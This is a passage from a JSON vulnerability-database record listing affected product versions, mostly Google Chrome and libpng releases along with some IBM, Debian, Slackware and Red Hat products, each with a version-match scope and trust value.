"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.76"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.40"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.203"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.95"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.6.7"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.5.7"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.805.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.789.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.21"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.32"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.24"
},
{
"_id": null,
"model": "cognos metrics manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "41.0.2272"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.315"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.55"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.11"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.9"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.109"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.901.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1285.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.729.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.23"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.102"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.5.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.15"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.10"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.25"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "40.0.2214.111"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.727.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.105"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.748.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.7"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.89"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.76"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.82"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.30"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.654.0"
},
{
"_id": null,
"model": "cplex enterprise server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "12.6.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "35.0.1916.72"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.32"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "29.0.1547.10"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.80"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.47"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.119"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.39"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.16"
},
{
"_id": null,
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.3.4"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.13"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.57"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.8"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.73"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.862.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.35"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.33"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.12"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.101"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.37"
},
{
"_id": null,
"model": "websphere real time sr9",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "40.0.2214.91"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.6"
},
{
"_id": null,
"model": "fabric manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.1"
},
{
"_id": null,
"model": "linux ia-64",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.721.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.26"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.6"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "46.0.2490"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.90"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.2"
},
{
"_id": null,
"model": "tivoli common reporting",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.1.0.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.8"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.132"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.51"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.336"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.32"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.602.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.16"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1049.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.72"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.27"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.18"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1058.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.79"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.931.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.115"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.722.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.60"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.35"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.651.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.31"
},
{
"_id": null,
"model": "tivoli monitoring",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2.3.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.109"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.124"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.44"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1055.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1670.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.38"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.33"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.690.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.75"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.42"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.73"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.64"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.570.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.13"
},
{
"_id": null,
"model": "linux x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "14.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.90"
},
{
"_id": null,
"model": "tivoli network manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.1.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "35.0.1916.98"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.47"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.44"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.10"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.11"
},
{
"_id": null,
"model": "chrome",
"scope": "ne",
"trust": 0.3,
"vendor": "google",
"version": "49.0.2623.75"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.44"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.27"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.634.1"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.5.4"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1085.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.664.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1700.26"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.83"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.596.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.46"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.103"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.113"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.53"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.730.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1060.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.40"
},
{
"_id": null,
"model": "libpng",
"scope": "ne",
"trust": 0.3,
"vendor": "libpng",
"version": "1.5.24"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.610.0"
},
{
"_id": null,
"model": "powerkvm build",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.12"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.48"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.43"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.24"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.116"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.31"
},
{
"_id": null,
"model": "forms viewer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.0.0.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1036.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.41"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.19"
},
{
"_id": null,
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1700.56"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1668.6"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.107"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.615.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.599.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.99"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.51"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.102"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.12"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "35.0.1916.92"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1675.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.30"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.50"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.4.11"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.873.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.116"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.794.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.40"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.35"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.781.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.34"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1298.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.134"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.72"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.34"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.554.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.45"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.775.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.59"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.13"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.36"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.7"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.631.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.125"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.114"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.102"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.54"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.941.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.35"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.37"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1684.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.48"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1289.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1008.0"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.1"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.5.10"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "35.0.1916.6"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.943.0"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.4.4"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.21"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.609.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.114"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364160"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "4.0.211.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.42"
},
{
"_id": null,
"model": "decision optimization center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.7.0.2"
},
{
"_id": null,
"model": "tivoli network manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.9"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.582.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.63"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.589.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.41"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.59"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "26.0.1410.43"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.4"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.90"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.575.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1671.8"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.26"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1663.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.26"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "29.0.1547.33"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "14.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1280.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.84"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.21"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.30"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.122"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.40"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.39"
},
{
"_id": null,
"model": "enterprise linux hpc node optional",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.37"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1700.74"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.25"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.726.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.5"
},
{
"_id": null,
"model": "enterprise linux server supplementary",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.667.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1034.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.81"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.22"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.112"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.716.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.45"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.700.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1684.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.5"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.14"
},
{
"_id": null,
"model": "chrome",
